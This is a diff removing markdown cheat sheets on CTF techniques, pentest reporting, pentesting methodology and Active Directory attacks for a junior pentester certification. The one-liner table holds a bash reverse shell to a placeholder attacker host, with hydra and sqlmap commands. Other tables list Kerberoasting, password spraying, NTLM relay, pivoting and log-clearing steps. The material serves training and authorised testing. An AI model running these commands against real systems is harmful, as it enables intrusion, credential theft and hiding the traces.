 | **Steganography in Ciphertext** | Visual inspection | Search for patterns, analyze character distribution | Check for hidden messages in structure of ciphertext |
 | **Multi-layered Encoding** | CyberChef, custom scripts | Chain decoding operations | Work backwards, identify each layer |
 ## Forensics
 | Challenge Type | Tools | Commands/Techniques | Common Approaches |
 |----------------|-------|---------------------|-------------------|
 | **File Analysis** | file, strings, xxd | `file unknown`, `strings -n 8 file`, `xxd file` | Check file type, extract readable strings |
 | **Image Forensics** | exiftool, binwalk, steghide | `exiftool image.jpg`, `binwalk -e image.jpg` | Check metadata, extract hidden files |
 | **LSB Steganography** | zsteg, stegsolve, OpenStego | `zsteg image.png`, `stegsolve` (GUI tool) | Check least significant bits, try different bit planes |
 | **Audio Steganography** | Audacity, Sonic Visualizer | Open file, view spectogram (CTRL+3 in Audacity) | Look for patterns in spectogram, Morse code |
 | **Memory Dumps** | Volatility | `vol.py -f memory.dump imageinfo`, `vol.py -f memory.dump --profile=Win7SP1x64 pslist` | Identify processes, network connections, retrieve files |
 | **Disk Images** | Autopsy, FTK Imager, TestDisk | Mount image, browse filesystem | Recover deleted files, examine file system artifacts |
 | **Network Captures** | Wireshark, tcpdump, NetworkMiner | `wireshark capture.pcap`, `tcpdump -r capture.pcap` | Follow TCP streams, extract files, analyze HTTP traffic |
 | **PDF Analysis** | pdfid, pdf-parser, peepdf | `pdfid suspicious.pdf`, `pdf-parser -s JavaScript suspicious.pdf` | Check for hidden objects, JavaScript, embedded files |
 | **USB Artifacts** | RegRipper, Autopsy | Examine Windows registry | Check setupapi logs, USB device history |
 | **ZIP/Archive Analysis** | zipdetails, file-roller, foremost | `zipdetails archive.zip` | Check for hidden files, broken archives |
 | **Corrupted Files** | hexedit, bless | Manual hex editing | Fix file headers, repair broken structures |
 ## Reverse Engineering
 | Challenge Type | Tools | Commands/Techniques | Common Approaches |
 |----------------|-------|---------------------|-------------------|
 | **Binary Analysis** | Ghidra, IDA Pro, radare2 | `r2 -A binary`, `ghidra` (GUI) | Disassemble, look for interesting functions |
 | **Static Analysis** | objdump, nm, strings | `objdump -d binary`, `nm binary`, `strings binary` | Check for function names, strings, disassembly |
 | **Dynamic Analysis** | GDB, PEDA, strace, ltrace | `gdb ./binary`, `strace ./binary`, `ltrace ./binary` | Set breakpoints, analyze memory, trace calls |
 | **Patching Binaries** | hexedit, Ghidra, radare2 | `r2 -w binary`, patch with hex editor | Modify conditions, bypass checks |
 | **Anti-debugging** | GDB scripts, strace | Set hardware breakpoints, analyze pattern | Look for time checks, debugger detection |
 | **Obfuscated Code** | De-obfuscation tools, manual analysis | Rename variables, reformat code | Look for patterns, decode strings |
 | **Android APK** | jadx, apktool, dex2jar | `apktool d app.apk`, `jadx-gui app.apk` | Decompile to Java, check AndroidManifest.xml |
 | **Java/JAR** | JD-GUI, CFR decompiler | `java -jar cfr.jar target.jar --outputdir output` | Decompile to source, check resources |
 | **Python** | uncompyle6, pyinstxtractor | `uncompyle6 script.pyc` | Decompile to source |
 | **.NET/C#** | dnSpy, ILSpy | Open with dnSpy (GUI) | Decompile to source, modify and recompile |
 | **Go Binaries** | Ghidra with Go plugin | Look for Go signatures | Identify main.main, recover structures |
 ## Binary Exploitation
 | Challenge Type | Tools | Commands/Techniques | Common Approaches |
 |----------------|-------|---------------------|-------------------|
 | **Buffer Overflow** | GDB, PEDA, pwntools | `pattern create 100`, check EIP/RIP overwrite | Find offset, control EIP, locate/create shellcode |
 | **Format String** | GDB, pwntools | `%x %x %x` to leak stack, `%n` to write | Leak addresses, overwrite GOT/return addresses |
 | **Return-to-Libc** | GDB, ROPgadget, pwntools | `ROPgadget --binary ./target` | Find gadgets, build ROP chain |
 | **Heap Exploitation** | GDB, heapinfo, pwntools | Analyze heap structures | Understand allocator, exploit use-after-free/double-free |
 | **ROP (Return Oriented Programming)** | ROPgadget, ropper | `ROPgadget --binary ./target --ropchain` | Build chain of gadgets to execute arbitrary code |
 | **Integer Overflow** | GDB, code review | Find vulnerable math operations | Identify wrap-around conditions |
 | **Race Conditions** | strace, custom scripts | Identify time-of-check/time-of-use issues | Create script to exploit timing windows |
 | **PIE/ASLR Bypass** | GDB, info proc mappings | Leak addresses, partial overwrite | Find information leaks to determine addresses |
 | **Shellcoding** | pwntools, shellcraft | `shellcraft.sh()` or custom shellcode | Create or adapt shellcode for specific scenarios |
 | **Kernel Exploitation** | Specialized tools, GDB | Varies based on challenge | Understand kernel structures, find vulnerabilities |
 | **SROP (Sigreturn Oriented Programming)** | pwntools | Use SigreturnFrame in pwntools | Craft fake signal frames to control registers |
 ## OSINT (Open Source Intelligence)
 | Challenge Type | Tools | Commands/Techniques | Common Approaches |
 |----------------|-------|---------------------|-------------------|
 | **Social Media Research** | Sherlock, Social Mapper | `sherlock username` | Search for usernames across platforms |
 | **Email Investigation** | theHarvester, Hunter.io | `theHarvester -d company.com -b all` | Gather email formats, verify addresses |
 | **Domain Intelligence** | Whois, nslookup, dnsrecon | `whois domain.com`, `dnsrecon -d domain.com` | Check registration, subdomains, DNS records |
 | **Image Analysis** | Google Images, Yandex, TinEye | Reverse image search | Find original source, hidden locations/data |
 | **Geolocation** | GeoGuessr techniques, Google Maps | Look for landmarks, signs, architecture | Identify location from visual clues |
 | **Public Records** | Public databases, search engines | Advanced Google dorks | Find specific document types, information |
 | **Person Research** | People search engines, public records | Search by name, location, associations | Build connections between entities |
 | **Phone Numbers** | PhoneInfoga, truecaller | `phoneinfoga scan -n +1234567890` | Identify carrier, location, owner |
 | **Metadata Analysis** | exiftool, metagoofil | `exiftool document.pdf` | Extract device info, location, author |
 | **Wireless Networks** | Wigle.net | Search by BSSID/SSID | Find physical locations of wireless access points |
 | **Website Archives** | Wayback Machine, archive.today | Check historical versions | Find deleted content, changes over time |
 ## Programming Challenges
 | Challenge Type | Tools | Commands/Techniques | Common Approaches |
 |----------------|-------|---------------------|-------------------|
 | **Python Scripting** | Python, pwntools | `from pwn import *` for CTF scripts | Automate repetitive tasks, solve mathematical problems |
 | **Socket Programming** | Python, netcat, pwntools | `r = remote('host', port)` | Create client to interact with remote service |
 | **Parsing & Data Extraction** | Python (re, beautifulsoup4) | `import re`, `from bs4 import BeautifulSoup` | Extract patterns from text/HTML, parse structured data |
 | **Algorithm Implementation** | Python, C/C++ | Implement common algorithms | Understand problem, code efficient solution |
 | **Esoteric Languages** | Specialized interpreters | Research language specifications | Identify language (brainfuck, ook, etc), use interpreter |
 | **Automation** | Python, Bash scripting | Create script to solve repetitive challenges | Automate multiple requests, parse responses |
 | **API Interaction** | Python (requests), Postman | `import requests` | Understand API endpoints, craft proper requests |
 | **SQL Challenges** | MySQL, SQLite, Python | `import sqlite3` | Create queries to extract specific data |
 | **Regular Expressions** | regex101.com, Python re | `re.findall(pattern, text)` | Create patterns to match/extract specific text |
 | **Cryptography Implementation** | Python (pycrypto, cryptography) | `from Crypto.Cipher import AES` | Implement encryption/decryption algorithms |
 | **Computational Challenges** | Python, SageMath | Mathematical libraries | Solve number theory, optimization problems |
 ## Miscellaneous Techniques
 | Challenge Type | Tools | Commands/Techniques | Common Approaches |
 |----------------|-------|---------------------|-------------------|
 | **QR Codes** | ZBar, mobile phone | `zbarimg qrcode.png` | Scan code, check for errors/modifications |
 | **Morse Code** | Audio tools, online converters | Listen or visualize, convert to text | Transcribe dots/dashes, convert to ASCII |
 | **Barcode** | ZBar, barcode scanners | `zbarimg barcode.png` | Identify barcode type, scan |
 | **Whitespace/Nonprintable** | hexdump, xxd, specialized tools | `xxd file \| grep -v "0000"` | Look for tab/space patterns, invisible characters |
 | **Brainfuck/Esoteric Languages** | Online interpreters | Identify syntax, use appropriate interpreter | Recognize patterns, find corresponding interpreter |
 | **Parity Bits** | Custom scripts | Check bit patterns | Identify odd/even parity schemes |
 | **Magic Numbers/File Headers** | hexedit, xxd | `xxd file \| head` | Fix incorrect file headers, identify true file type |
 | **Location-based Challenges** | Google Maps, OSINT techniques | Research geographic elements | Look for coordinates, landmarks, geotags |
 | **Subway/Train Maps** | Official transit maps | Research transit systems | Decode station sequences, find connections |
 | **Book Ciphers** | Online databases, physical books | Identify book, apply cipher method | Look for page/line/word references |
 | **3D Files/Printing** | Blender, MeshLab | Open and inspect 3D models | Look inside 3D models, check for hidden text |
 | **Historic/Classical Ciphers** | dcode.fr, specialized tools | Research cipher methods | Identify cipher from clues, apply appropriate technique |
 ## Useful Command-Line One-Liners
 | Purpose | Command | Notes |
 |---------|---------|-------|
 | **Extract strings from binary** | `strings -n 8 binary \| grep -i flag` | Find strings containing "flag" |
 | **Find hidden text in image** | `steghide extract -sf image.jpg` | Attempts to extract without password |
 | **Extract embedded files** | `binwalk -e suspicious_file` | Extracts detected files |
 | **Follow TCP stream in PCAP** | `tshark -r capture.pcap -Y "tcp.stream eq 1" -T fields -e data` | Extract specific TCP stream |
 | **Convert hex to ASCII** | `echo "48656c6c6f" \| xxd -r -p` | Hex to text conversion |
 | **Analyze image metadata** | `exiftool -a -u image.jpg` | Shows all metadata including unknown tags |
 | **Fix file signature/magic bytes** | `printf '\x89\x50\x4e\x47' \| dd of=file.png bs=1 count=4 conv=notrunc` | Fix corrupted PNG header |
 | **Extract ZIP comment** | `unzip -z file.zip` | Get hidden info in ZIP comment field |
 | **Get HTTP headers** | `curl -I https://example.com` | Check server headers for info |
 | **Extract EXIF GPS data** | `exiftool -n -p '$GPSLatitude, $GPSLongitude' image.jpg` | Extract coordinates from image |
 | **Find files modified in last 24h** | `find / -type f -mtime -1` | Recent file changes |
 | **Dump HTTP response with SSL info** | `openssl s_client -connect example.com:443` | SSL certificate analysis |
 | **Get favicon hash for shodan** | `curl https://example.com/favicon.ico \| openssl dgst -md5` | Favicon fingerprinting |
 | **Brute force basic auth** | `hydra -l admin -P wordlist.txt example.com http-get /admin/` | Password attacks |
 | **Extract SSL certificate details** | `echo \| openssl s_client -connect example.com:443 -showcerts` | Certificate analysis |
 | **Check for SQL injection** | `sqlmap -u "https://example.com/page.php?id=1" --dbs` | Quick SQLi test |
 | **Find writable web directories** | `find /var/www/ -type d -writable` | Identify upload targets |
 | **List all open ports** | `netstat -tulpn` | Check listening services |
 | **Verify file hash** | `sha256sum file.bin` | Confirm file integrity |
 | **One-liner reverse shell** | `bash -i >& /dev/tcp/attacker-ip/4444 0>&1` | Basic reverse shell |
 | **Convert epoch time** | `date -d @1609459200` | Translate timestamps |
--- a/infosec/pentest-reporting.md
+++ b/infosec/pentest-reporting.md
@ -1,175 +0,0 @@
 # Penetration Testing Reporting Cheatsheet
 ## General Report Structure Elements
 | Section | Purpose | Key Components | Tips |
 |---------|---------|----------------|------|
 | **Cover Page** | Formal introduction to report | Client name, test dates, report date, classification | Include security classification (Confidential) |
 | **Executive Summary** | High-level overview for leadership | Key findings, risk rating, strategic recommendations | 1-2 pages, non-technical, business impact focus |
 | **Scope & Methodology** | Define what was tested and how | Systems tested, approach used, tools employed | Be specific about what was in/out of scope |
 | **Findings Overview** | Summarize discovered vulnerabilities | Risk ratings chart, vulnerability count by severity | Use visual aids (charts, graphs) |
 | **Detailed Findings** | Technical details of each vulnerability | Title, severity, description, impact, reproduction steps, remediation | Include screenshots, code samples when helpful |
 | **Risk Rating Methodology** | Explain how risk was calculated | Scoring system (CVSS), impact vs likelihood matrix | Ensures transparency in severity ratings |
 | **Remediation Roadmap** | Prioritized fix recommendations | Short/medium/long-term actions, effort estimates | Help client prioritize fixes |
 | **Conclusion** | Wrap-up and final thoughts | Overall security posture assessment, improvement trajectory | Positive but realistic tone |
 | **Appendices** | Supporting technical details | Raw scan data, testing evidence, methodological details | Keep detailed logs here, not in main report |
 ## External Network Penetration Test Report
 | Section | Specific Content | Important Elements |
 |---------|------------------|-------------------|
 | **Scope Definition** | External IP ranges, domains, exposed services | Clear network boundaries, exclusions |
 | **Reconnaissance Findings** | Exposed information, digital footprint | OSINT results, information leakage assessment |
 | **Network Findings** | Discovered vulnerabilities by host/service | Port scan results, service enumeration |
 | **Perimeter Security Assessment** | Firewall, VPN, remote access evaluation | Configuration weaknesses, unnecessary exposure |
 | **External Service Vulnerabilities** | Web, email, DNS, etc. vulnerabilities | Version information, misconfigurations |
 | **Access Control Testing** | Authentication bypass attempts | Brute force results, credential findings |
 | **Exfiltration Testing** | Data leakage test results | DLP effectiveness, unmonitored channels |
 | **Social Engineering Results** | Phishing campaign results (if in scope) | Click rates, credential capture statistics |
 | **Internet-Facing Application Findings** | Public application vulnerabilities | API security, exposed dev environments |
 | **Threat Modeling** | Attack vectors assessment | Most likely attack paths |
 ## Internal Network Penetration Test Report
 | Section | Specific Content | Important Elements |
 |---------|------------------|-------------------|
 | **Network Architecture Review** | Overview of internal design | Segmentation assessment, trust relationships |
 | **Active Directory Assessment** | Domain security findings | Group Policy, privilege management issues |
 | **Lateral Movement Findings** | Ability to move between systems | Successful pivoting techniques, trust exploitation |
 | **Privilege Escalation Paths** | Routes to elevated access | Local to domain admin paths, misconfigurations |
 | **Internal Service Vulnerabilities** | File shares, internal applications, databases | Access control issues, sensitive data exposure |
 | **Password Policy Evaluation** | Password strength assessment | Password spray results, policy compliance |
 | **Data Access Controls** | Sensitive data protection assessment | Unauthorized access findings, excessive permissions |
 | **Endpoint Security Findings** | Workstation/server vulnerabilities | Missing patches, AV evasion success |
 | **Network Device Security** | Switch, router, wireless findings | Management interface issues, protocol weaknesses |
 | **Post-Exploitation Results** | Actions taken after initial compromise | Data accessed, persistence established |
 ## Web Application Penetration Test Report
 | Section | Specific Content | Important Elements |
 |---------|------------------|-------------------|
 | **Application Overview** | Description of tested application | Functionality, technologies, architecture |
 | **Authentication Mechanisms** | Login security assessment | Brute force, account recovery, session management |
 | **Authorization Controls** | Access control evaluation | Vertical/horizontal privilege issues, IDOR |
 | **Input Validation Findings** | Injection vulnerabilities | SQL, XSS, CSRF, XXE, command injection |
 | **Business Logic Flaws** | Workflow/process vulnerabilities | Logical bypasses, process sequence issues |
 | **Sensitive Data Exposure** | Data protection assessment | Encryption issues, exposure in transit/at rest |
 | **API Security Findings** | API endpoint vulnerabilities | Authentication, rate limiting, RBAC issues |
 | **Client-Side Security** | Browser-based vulnerabilities | DOM XSS, client-side validation bypass |
 | **Security Headers & Configuration** | Server/application configuration | Missing headers, dangerous settings |
 | **Third-Party Component Analysis** | Vulnerable dependencies | Outdated libraries, known CVEs |
 | **OWASP Top 10 Coverage** | Mapping to OWASP categories | Comprehensive coverage confirmation |
 ## Mobile Application Penetration Test Report
 | Section | Specific Content | Important Elements |
 |---------|------------------|-------------------|
 | **Application Architecture** | App design and components | Client-server interactions, technologies |
 | **Reverse Engineering Results** | App code analysis findings | Obfuscation effectiveness, hardcoded secrets |
 | **Local Data Storage** | Data storage security | Sensitive data in local storage, encryption issues |
 | **Authentication & Session Management** | Login security, session handling | Token security, biometric implementation |
 | **Network Communication** | API calls, data transmission | Certificate validation, encryption in transit |
 | **Platform-Specific Issues** | iOS/Android security concerns | Permissions, intents/URL schemes, jailbreak detection |
 | **Code Quality & Implementation** | Implementation vulnerability | Memory corruption, native code issues |
 | **Privacy Concerns** | User data handling | Excessive data collection, tracking |
 | **Backend API Security** | Server-side endpoint security | Same issues as web API testing |
 | **OWASP MASVS Coverage** | Mobile security verification | Mapping to MASVS requirements |
 ## Cloud Security Assessment Report
 | Section | Specific Content | Important Elements |
 |---------|------------------|-------------------|
 | **Cloud Architecture Review** | Cloud infrastructure design | Service models (IaaS/PaaS/SaaS), deployment model |
 | **Identity & Access Management** | IAM configuration security | Permissions, roles, privilege management |
 | **Cloud Configuration Review** | Service configuration assessment | Misconfigurations, insecure defaults |
 | **Storage Security** | Cloud storage evaluation | Bucket permissions, data classification issues |
 | **Compute Security** | VM/container/serverless security | Patch management, hardening issues |
 | **Network Security** | Cloud network controls | VPC design, security groups, NACLs |
 | **Logging & Monitoring** | Visibility assessment | Log coverage, alerting configuration |
 | **Key Management** | Encryption implementation | Key rotation, access controls |
 | **Multi-Tenancy Risks** | Isolation effectiveness | Potential cross-tenant vulnerabilities |
 | **Compliance Alignment** | Regulatory requirement gaps | Standards/framework alignment (e.g., CSA CCM) |
 | **Provider-Specific Findings** | AWS/Azure/GCP specific issues | Service-specific vulnerabilities |
 ## AI System Penetration Test Report
 | Section | Specific Content | Important Elements |
 |---------|------------------|-------------------|
 | **AI System Architecture** | System design and components | Model types, training pipeline, deployment |
 | **Prompt Injection Findings** | LLM vulnerability assessment | Direct/indirect injection, jailbreaking success |
 | **Model Security Testing** | Model-specific vulnerabilities | Adversarial examples, data extraction attempts |
 | **Training Pipeline Security** | Development process security | Supply chain, data poisoning vectors |
 | **API Security Assessment** | Interface security issues | Rate limiting, authentication, input validation |
 | **Output Filtering Evaluation** | Safety mechanism assessment | Filter bypass success, content policy violations |
 | **Data Privacy Analysis** | PII/sensitive data handling | Training data leakage, inference attacks |
 | **Infrastructure Security** | Deployment environment security | Model hosting, vector database security |
 | **MITRE ATLAS Mapping** | Tactic/technique correlation | Mapping findings to ATLAS framework |
 | **MLOps Security** | Operational security issues | CI/CD, monitoring, update mechanisms |
 | **Prompt Management Security** | System prompt protection | Prompt extraction success, prompt injection |
 ## IoT/OT Penetration Test Report
 | Section | Specific Content | Important Elements |
 |---------|------------------|-------------------|
 | **Device Inventory** | Tested device details | Firmware versions, communication protocols |
 | **Hardware Security** | Physical security findings | Debug ports, physical attack vectors |
 | **Firmware Analysis** | Firmware security assessment | Extracted secrets, backdoors, update mechanisms |
 | **Communication Protocol Security** | Protocol vulnerability findings | Encryption, authentication, protocol flaws |
 | **Communication Interception** | Traffic analysis results | Cleartext data, weak encryption |
 | **Device API Security** | Interface security issues | Authentication, authorization flaws |
 | **OT Network Segmentation** | Isolation effectiveness | IT/OT boundary controls, zone separation |
 | **Human-Machine Interface Security** | HMI vulnerability assessment | Access controls, input validation |
 | **Control Systems Security** | ICS/SCADA specific findings | Protocol vulnerabilities, logic controllers |
 | **Safety System Assessment** | Safety mechanism evaluation | Safety override possibilities, physical impact |
 | **Operational Impact Analysis** | Business/safety implications | Real-world consequences of vulnerabilities |
 ## Remediation Guidance Best Practices
 | Component | Description | Example |
 |-----------|-------------|---------|
 | **Clear Issue Title** | Descriptive vulnerability name | "Stored XSS in User Profile Comments" |
 | **Severity Rating** | Risk level with justification | "High - Allows account takeover via stored payload" |
 | **Detailed Description** | Technical explanation | "The application fails to sanitize HTML in user comments..." |
 | **Proof of Concept** | Step-by-step reproduction | Numbered steps to reproduce the issue |
 | **Evidence/Screenshots** | Visual documentation | Redacted screenshots showing vulnerability |
 | **Affected Systems** | Scope of vulnerability | "All user profile pages across the application" |
 | **Business Impact** | Real-world consequences | "Attackers could steal user credentials or perform actions as the victim" |
 | **Remediation Steps** | Specific fix instructions | Code examples, configuration changes |
 | **References** | Supporting information | CWE numbers, OWASP references, vendor docs |
 | **Validation Method** | How to confirm the fix | Test cases to verify remediation |
 ## Reporting Tips by Audience
 | Audience | Focus Areas | Format Tips | Language Considerations |
 |----------|-------------|------------|------------------------|
 | **Executive Leadership** | Business risk, cost implications | Brief summary, visual aids | Non-technical, business terms |
 | **IT Management** | Resource planning, implementation strategy | Prioritized roadmap | Semi-technical, project management terms |
 | **Security Team** | Technical details, security architecture | Comprehensive findings | Technical, security terminology |
 | **Developers** | Implementation guidance, code examples | Specific remediation steps | Programming language-specific guidance |
 | **Compliance Team** | Regulatory impact, compliance gaps | Mapping to requirements | Compliance framework terminology |
 | **Third-Party Disclosure** | Responsible disclosure format | Minimal necessary details | Clear timeline expectations |
 ## Risk Rating Frameworks
 | Framework | Components | Calculation | Best For |
 |-----------|------------|-------------|----------|
 | **CVSS v3.1** | Base, Temporal, Environmental | Score 0-10 from metrics | Standardized vulnerability rating |
 | **OWASP Risk Rating** | Likelihood × Impact | Produces Low/Medium/High/Critical | Web application vulnerabilities |
 | **DREAD** | Damage, Reproducibility, Exploitability, Affected users, Discoverability | Average of 5 factors (0-10) | Application security assessment |
 | **Custom Severity Matrix** | Impact × Likelihood | Typically 3×3 or 5×5 matrix | Organizational alignment |
 | **Qualitative Rating** | Professional judgment | Low/Medium/High/Critical | When metrics are difficult to apply |
 ## Report Quality Checklist
 | Aspect | Check | Common Pitfalls |
 |--------|-------|-----------------|
 | **Accuracy** | Verified findings, tested recommendations | False positives, untested remediation advice |
 | **Clarity** | Clear, concise language | Excessive jargon, ambiguous descriptions |
 | **Completeness** | All required sections, comprehensive coverage | Missing methodology, incomplete findings |
 | **Professionalism** | Proper formatting, no typos | Spelling errors, inconsistent formatting |
 | **Actionability** | Clear remediation steps | Vague recommendations, missing context |
 | **Evidence Quality** | Proper screenshots, redacted sensitive data | Unclear evidence, over-redaction |
 | **Business Context** | Practical impact explanation | Missing real-world consequences |
 | **Technical Depth** | Appropriate level of detail | Too shallow or overly complex explanations |
 | **Executive Value** | Clear risk communication | Missing business context for executives |
 | **Scope Alignment** | Findings within agreed scope | Out-of-scope issues without clarification |
--- a/infosec/pentesting-methodology.md
+++ b/infosec/pentesting-methodology.md
@ -1,62 +0,0 @@
 # Penetration Testing Methodology Cheatsheet
 | Phase | Activity | Tools/Commands | Notes |
 |-------|----------|----------------|-------|
 | **Reconnaissance** ||||
 | OSINT gathering | Collect public information | theHarvester, Maltego, Shodan | `theHarvester -d target.com -l 500 -b google` |
 | Subdomain enumeration | Find subdomains | Sublist3r, Amass, crt.sh | `amass enum -d target.com` |
 | DNS information | Gather DNS records | dig, nslookup, DNSrecon | `dig any target.com` |
 | Email harvesting | Find email addresses | theHarvester, Hunter.io | `theHarvester -d target.com -b linkedin` |
 | Social media intel | Analyze social presence | Social-Analyzer | `social-analyzer --username "target"` |
 | **Scanning** ||||
 | Network scanning | Discover hosts/services | Nmap, Masscan | `nmap -sS -A -T4 target.com` |
 | Vulnerability scanning | Identify vulnerabilities | Nessus, OpenVAS, Nexpose | `nmap --script vuln target.com` |
 | Web application scanning | Find web vulnerabilities | Nikto, OWASP ZAP, Burp Suite | `nikto -h target.com` |
 | Port scanning | Identify open ports | Nmap, Rustscan | `rustscan -a target.com -- -sV` |
 | Service enumeration | Identify running services | Nmap scripts | `nmap -sV -sC target.com` |
 | **Enumeration** ||||
 | Web content discovery | Find hidden content | Gobuster, dirsearch, ffuf | `gobuster dir -u target.com -w wordlist.txt` |
 | API enumeration | Discover API endpoints | Swagger-scanner, ffuf | `ffuf -w paths.txt -u target.com/FUZZ` |
 | Network shares | Identify accessible shares | enum4linux, smbmap | `enum4linux -a target.com` |
 | SNMP enumeration | Gather SNMP information | snmpwalk, onesixtyone | `snmpwalk -v2c -c public target.com` |
 | User enumeration | Identify valid users | Kerbrute, smtp-user-enum | `kerbrute userenum -d domain.com userlist.txt` |
 | **Vulnerability Assessment** ||||
 | CMS scanning | Test CMS vulnerabilities | WPScan, CMSmap, Droopescan | `wpscan --url target.com` |
 | SSL/TLS testing | Check SSL configuration | SSLyze, testssl.sh | `sslyze target.com:443` |
 | Password attacks | Test password security | Hydra, Medusa, Hashcat | `hydra -l admin -P passwords.txt target.com http-post-form` |
 | Misconfigurations | Find security misconfigs | Nuclei, grype | `nuclei -u target.com -t misconfiguration/` |
 | Default credentials | Check default passwords | Default Cred Scanner | Test common username/password combinations |
 | **Exploitation** ||||
 | Web exploitation | Exploit web vulnerabilities | Burp Suite, sqlmap | `sqlmap -u "target.com/page?id=1" --dbs` |
 | Buffer overflows | Exploit memory corruption | Immunity Debugger, PEDA | Customize exploit code for target |
 | Privilege escalation | Gain higher privileges | LinPEAS, WinPEAS | `./linpeas.sh` |
 | Lateral movement | Move across network | Mimikatz, CrackMapExec | `crackmapexec smb 192.168.1.0/24` |
 | Password cracking | Break password hashes | Hashcat, John the Ripper | `hashcat -m 1000 hash.txt wordlist.txt` |
 | **Post-Exploitation** ||||
 | Persistence | Maintain access | Empire, Covenant | Create backdoor accounts |
 | Data exfiltration | Extract sensitive data | PowerShell scripts, exfil tools | Test DLP controls |
 | Pivoting | Use compromised host | Metasploit, chisel | `meterpreter> portfwd add -l 3389 -p 3389 -r target` |
 | Covering tracks | Remove evidence | Log manipulation | Clear event logs, remove artifacts |
 | Evidence collection | Document findings | Screenshot tools, logs | Document all successful attacks |
 | **Reporting** ||||
 | Vulnerability validation | Verify findings | Manual testing | Eliminate false positives |
 | Risk assessment | Rate vulnerability impact | CVSS calculator | Determine risk levels |
 | Remediation planning | Suggest fixes | Best practice guides | Provide actionable recommendations |
 | Report writing | Document methodology | Templates, markdown | Include executive summary |
 | Evidence presentation | Present attack path | Network diagrams | Show attack chains |
 ## Common Ports & Services
 | Port | Service | Common Vulnerabilities |
 |------|---------|------------------------|
 | 21 | FTP | Anonymous access, default credentials, cleartext auth |
 | 22 | SSH | Weak passwords, outdated versions, key mismanagement |
 | 23 | Telnet | Cleartext communications, outdated service |
 | 25 | SMTP | Open relay, user enumeration, outdated software |
 | 53 | DNS | Zone transfers, cache poisoning, DNSSEC issues |
 | 80/443 | HTTP/HTTPS | XSS, SQLi, broken authentication, outdated software |
 | 135 | MSRPC | Authentication bypass, RCE vulnerabilities |
 | 139/445 | SMB/CIFS | EternalBlue, null sessions, weak permissions |
 | 1433/1434 | MSSQL | Weak SA password, excessive privileges |
 | 3306 | MySQL | Weak credentials, outdated versions |
 | 3389 | RDP | BlueKeep, default/weak credentials |
--- a/infosec/pjpt-reference.md
+++ b/infosec/pjpt-reference.md
@ -1,155 +0,0 @@
 # PJPT (Practical Junior Penetration Tester) Cheatsheet
 ## Initial Enumeration (Internal Network)
 | Task | Tool/Command | Example | Notes |
 |------|--------------|---------|-------|
 | Network Discovery | Nmap | `nmap -sn 192.168.1.0/24` | Identify live hosts |
 | | Ping sweep | `for i in {1..254}; do (ping -c 1 192.168.1.$i \| grep "bytes from" &); done` | Quick host discovery |
 | | ARP scan | `arp-scan --interface=eth0 --localnet` | More reliable on local network |
 | | Netdiscover | `netdiscover -r 192.168.1.0/24` | Passive ARP reconnaissance |
 | | Responder | `responder -I eth0 -A` | Analyze mode to see NBT-NS/LLMNR traffic |
 | Port Scanning | Nmap | `nmap -sV -sC -p- 192.168.1.100` | Full port scan with service detection |
 | | Rustscan | `rustscan -a 192.168.1.100 -- -sV -sC` | Faster initial scan |
 | Domain Info | Enum4linux | `enum4linux -a 192.168.1.100` | Windows/Samba system enumeration |
 | | Nbtscan | `nbtscan 192.168.1.0/24` | NetBIOS name scanning |
 | | Ldapsearch | `ldapsearch -x -h 192.168.1.100 -s base namingcontexts` | LDAP query for naming contexts |
 | | PowerView | `Get-Domain` | PowerShell-based AD reconnaissance |
 | SMB Enumeration | SMBclient | `smbclient -L //192.168.1.100 -N` | List shares anonymously |
 | | SMBmap | `smbmap -H 192.168.1.100` | Map shares and permissions |
 | | CrackMapExec | `crackmapexec smb 192.168.1.0/24` | Network-wide SMB checking |
 ## Active Directory Attack Vectors
 | Attack Vector | Tool/Command | Example | Notes |
 |---------------|--------------|---------|-------|
 | **LLMNR/NBT-NS Poisoning** ||||
 | Capture hashes | Responder | `responder -I eth0 -wrf` | Capture NTLM hashes from traffic |
 | Relay attacks | ntlmrelayx | `ntlmrelayx.py -tf targets.txt -smb2support` | Relay captured credentials |
 | Disable LLMNR | PowerShell | `Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows NT\DNSClient" -Name EnableMulticast -Type DWord -Value 0` | Mitigation: disable LLMNR |
 | **Kerberoasting** ||||
 | Enumerate SPNs | PowerShell | `setspn -T domain -Q */*` | Find Service Principal Names |
 | Request tickets | PowerView | `Get-DomainUser -SPN \| Get-DomainSPNTicket` | Request service tickets |
 | | Rubeus | `Rubeus.exe kerberoast /outfile:hashes.txt` | Request and extract tickets |
 | | Impacket | `GetUserSPNs.py -request -dc-ip 192.168.1.100 domain/user` | Extract Kerberos tickets |
 | Crack tickets | Hashcat | `hashcat -m 13100 tickets.txt wordlist.txt` | Crack service tickets |
 | **Password Spraying** ||||
 | Domain users | Kerbrute | `kerbrute passwordspray -d domain.local --dc 192.168.1.100 users.txt Password123` | Test one password against many users |
 | | CrackMapExec | `crackmapexec smb 192.168.1.100 -u users.txt -p Password123` | SMB password spraying |
 | | DomainPasswordSpray | `Invoke-DomainPasswordSpray -Password 'Spring2023!'` | PowerShell-based spraying |
 | **AS-REP Roasting** ||||
 | Enumerate users | PowerView | `Get-DomainUser -PreauthNotRequired` | Find users with Kerberos pre-auth disabled |
 | Get tickets | Rubeus | `Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt` | Extract AS-REP hashes |
 | | Impacket | `GetNPUsers.py domain/ -no-pass -usersfile users.txt` | Extract AS-REP hashes |
 | Crack hashes | Hashcat | `hashcat -m 18200 asrep.txt wordlist.txt` | Crack AS-REP hashes |
 | **Bloodhound** ||||
 | Collect data | SharpHound | `SharpHound.exe -c All` | Collect AD info |
 | | Python | `bloodhound-python -u user -p password -d domain.local -ns 192.168.1.100 -c All` | Python-based collector |
 | Import data | BloodHound | GUI: Upload data files | Analyze attack paths |
 | Find paths | BloodHound | Queries: "Shortest Path to Domain Admins" | Identify privilege escalation paths |
 ## Local Privilege Escalation
 | Method | Tool/Command | Example | Notes |
 |--------|--------------|---------|-------|
 | **Windows** ||||
 | Initial enumeration | WinPEAS | `winPEASany.exe` | Automated privilege escalation checks |
 | | PowerUp | `Invoke-AllChecks` | PowerShell-based enumeration |
 | Service vulnerabilities | PowerUp | `Get-ServiceUnquoted` | Find unquoted service paths |
 | | PowerUp | `Get-ModifiableServiceFile` | Find modifiable service binaries |
 | Kernel exploits | Watson | `Watson.exe` | Find kernel vulnerabilities |
 | | Windows-Exploit-Suggester | `windows-exploit-suggester.py --database 2023-04-15-mssb.xls --systeminfo sysinfo.txt` | Match patches against exploits |
